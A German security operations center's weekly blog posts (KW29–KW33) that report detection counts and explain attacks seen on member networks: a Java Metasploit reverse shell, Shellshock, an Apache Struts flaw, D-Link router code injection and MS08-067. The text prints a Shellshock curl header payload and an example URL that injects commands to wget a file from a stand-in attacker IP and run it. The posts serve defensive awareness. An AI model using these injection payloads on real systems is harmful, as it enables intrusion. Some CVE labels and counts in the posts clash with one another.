Alle Beiträge von Martin Graf

CSOC-Event der Woche KW33: Die Konsequenz eines erfolgreich durchgeführten Exploits oder auch einer Phishing-Attacke

KW33: CSOC-Event der Woche – Java Metasploit Payload


Durchschnittliche CSOC-Gesamtevents pro Tag
:      35.619
Detektionshäufigkeit CVE-2017-6271:      16

Eventbeschreibung: Java Metasploit Payload

In dieser Woche möchten wir ein Event beschreiben, welches keinen Exploit an sich darstellt, sondern die Konsequenz eines erfolgreich durchgeführten Exploits oder auch einer Phishing-Attacke sein kann. In der Regel versuchen Angreifer, einen direkten Zugriff auf Systeme zu erlangen. Dies kann mithilfe eigens erzeugter Worddokumente oder wie in diesem Fall mittels einer Java-Anwendung passieren.
Das CSOC hat in der vergangenen Woche 16 mal Verbindung zu einem System eines Angreifers feststellen können, die als Konsequenz aus dem Ausführen einer schädlichen Java-Datei entstanden sind. Darüber hinaus handelte es sich um  Verbindungen, die über das Hacker-Framework Metasploit gesteuert werden können. Auf diesem Wege lassen sich Zugriffe sowie Datenübertragen mit dem betroffenen System durchführen.

Der für diese Verbindungen verantwortliche Schadcode wurde über den Datentransfer von Dateien über USB-Sticks in die System eingeschleust.

Technische Beschreibung: Java Metasploit Payload

Ist auf dem betroffenen System eine sog. Java-Runtime-Environment (JRE) installiert, können Dateien vom Typ .jar ausgeführt werden. Diese ausgeführte Datei baut daraufhin eine Verbindung mit dem System des Angreifers auf und gibt ihm die Kontrolle über eine sog. „Reverse-Shell“ – eine Kommandozeile per Remote. Im Rahmen der CSOC-Analysen gestalten sich Dateien vom Typ .jar als unkompliziert, da sie einfach dekompiliert werden können – aus dem Ausführungscode entsteht so wieder der eigentliche Quellcode, der wiederum auf die genaue Funktion der Datei schließen lässt.

CSOC-Event der Woche KW32: Sicherheitslücken der Unix-Shell „Bash“

KW32: CSOC-Event der Woche – Sicherheitslücke Unix-Shell „Bash“


Durchschnittliche CSOC-Gesamtevents pro Tag
:      42.371
Detektionshäufigkeit CVE-2017-6271:      36

Eventbeschreibung CVE-2014-6271

Diese Woche konnten wir bereits 36 Exploitversuche detektieren, welche auf Sicherheitslücken der Unix-Shell „Bash“ abzielen. Diese Feststellung ist grundsätzlich interessant, da die Schwachstelle bereits im Jahr 2014 entdeckt werden konnte und Systeme im Internet nach wie vor von Angreifern auf die Sicherheitslücke hin geprüft werden. Gefährlich kann diese Sicherheitslücke insbesondere für Linux / Unix-Webserver werden, wenn die Server CGI-Skripte verwenden, welche seit längerer Zeit nicht mit Updates versorgt wurden und Bash auf den lokalen Systemen als Shell genutzt wird. Die Sicherheitslücke wurde in CVE-2014-6271 definiert und näher beschrieben.

Technische Beschreibung: CVE-2014-6271

When a web server receives a request for a page there are three parts of the request that can be susceptible to the Shellshock attack: the request URL, the headers that are sent along with the URL, and what are known as "arguments" (when you enter your name and address on a web site it will typically be sent as arguments in the request). Shellshock occurs when the data is passed into the shell called "bash". Web servers quite often need to run other programs to respond to a request, and it's common that these variables are passed into bash or another shell. The Shellshock problem specifically occurs when an attacker modifies the origin HTTP request to contain the magic () { :; }; string. For example, if example.com was vulnerable then

curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/

would be enough to actually make the CD or DVD drive eject.

CSOC-Event der Woche KW31: Remote-Code-Ausführungen bei Apache Struts

KW31: CSOC-Event der Woche – Remote-Code-Ausführungen bei Apache Struts


Durchschnittliche CSOC-Gesamtevents pro Tag
:     46.131
Detektionshäufigkeit CVE-2017-5638:      28

Eventbeschreibung CVE-2017-5638 / Kritikalität = hoch (10 / 10)

In dieser Woche handelt es sich beim Event der Woche erneut um einen Exploit, der auf eine Remote-Code-Ausführung (Schadcode kann aus der Ferne auf einem Fremdsystem ausgeführt werden) in einer Webanwendung abzielt.

Bei der Webanwendung handelt es sich diesmal speziell um Apache Struts - ein Framework, das der Erstellung von Java-Webanwendungen dient. Die Schwachstelle ist zwar seit Anfang 2017 bekannt, die passenden Angriffsszenarien können von uns allerdings zunehmend beobachtet werden.
Als Quelle der versuchten Remote-Code-Ausführungen können überwiegend Schwachstellenscanner identifiziert werden. Mit diesen Tools wird aktiv nach Systemen gesucht, die die beschriebene Schwachstelle aufweisen. Diese Massenscans dienen häufig dazu, einen Angriff auf die verletzlichen Systeme vorzubereiten.

Sollten Sie einen Apache Struts-Server betreiben, überprüfen Sie bitte Ihr System auf die ordnungsgemäße Installation der aktuellsten Updates!

Technische Beschreibung: CVE-2017-5638

The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

CSOC-Event der Woche KW30: Remote-Code-Ausführung auf Webseiten

KW30: CSOC-Event der Woche – Remote-Code-Ausführung


Durchschnittliche CSOC-Gesamtevents pro Tag
:     47.334
Detektionshäufigkeit Remote-Code-Ausführung auf Webseiten:      134

Eventbeschreibung Remote-Code-Ausführung auf Webseiten / Kritikalität = hoch (9 / 10)

In der vergangenen Woche konnten wir 134 Male den Versuch einer Remote-Code-Ausführung (auch: Remote-Code-Execution) auf Webseiten und -Portalen unserer HUB-Mitglieder feststellen. Eine Remote-Code-Ausführung beschreibt das Einschleusen und Ausführen von Codes auf fremden Systemen. In den meisten Fällen handelt es sich bei den Zielsystemen um Geräte oder Dienste, die über das Internet erreichbar sind und eine entsprechende Schwachstelle besitzen.

Die Exploits, mit denen in dieser Woche versucht wurde, den fremden Code auf das System zu schleusen, wandten sich hauptsächlich gegen Weboberflächen von Routern des Herstellers D-Link. Innerhalb des Frameworks Metasploit (Hacker-Tool) existieren entsprechende Exploits für mehrere Systeme von D-Link. Der neuste Exploit trägt dort die Bezeichnung dlink_dir850l_unauth_exec.  Auch wenn Sie keinen D-Link-Router im Einsatz haben sollten, dessen Weboberfläche direkt über das Internet zu erreichen ist, überprüfen Sie bitte regelmäßig die Softwareversion Ihrer öffentlich (aus dem Internet) erreichbaren Geräte.

Technische Beschreibung: Remote-Code-Ausführung auf Webseiten

Das Schema der versuchten Remote-Code-Ausführungs-Angriffe, die wir beobachten konnten, ist meist identisch. Dabei wird grundsätzlich versucht, Kommandozeilenbefehle an das Betriebssystem zu übergeben, welches die Webseite betreibt. So wird beispielsweise versucht, Befehle in die URL einzubetten und aufzurufen. Als Beispiel könnte aus der Ursprungs-URL der fiktiven Webseite http://fiktive-webseite.de/login.php plötzlich eine URL mit Schadcode werden. Bei erfolgreicher Ausführung des Schadcodes im folgenden Beispiel lädt das Zielsystem vom Angreifer-System eine Datei herunter (wget http://IP-des-Angreifers) und führt diese aus (sh /tmp/xd): http://fiktive-webseite.de/login.php?cli=aaaa%27;wget%20http://IP-des-Angreifers%20-O%20-%3F%20/tmp/xd;sh%20/tmp/xd%28 (Beispiel-URL)

CSOC-Event der Woche KW29: CVE-2008-4250

KW29: CSOC-Event der Woche - CVE-2008-4250


Durchschnittliche CSOC-Gesamtevents pro Tag
:     114.785
Detektionshäufigkeit CVE-2008-4250 / MS-08-067:      76

Eventbeschreibung CVE-2008-4250 / Kritikalität = hoch (10 / 10)

Im Laufe der vergangenen Woche haben wir innerhalb der Netzwerke unserer HUB-Mitglieder zwölfmal die Ausführung eines älteren Remote-Code-Execution-Exploits registriert. Dieser Exploit nutzt eine Schwachstelle im SMB-Protokoll aus und kann per Knopfdruck zu vollständiger Systemübernahme führen. Betroffen sind insbesondere die älteren Windowsbetriebssysteme XP, 2000 und Server 2003. Die Schwachstelle wurde im Jahr 2008 insbesondere durch den Wurm „Conficker“ bekannt und zeigt auf, wie wichtig ein konsistentes Patch-Management sowie der Einsatz moderner Betriebssysteme ist. Das passende Schadcode-Modul ist in Metasploit (Hacker-Tool) bekannt als „ms08_067_netapi“.

Technische Beschreibung: (CVE-2008-4250)

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing.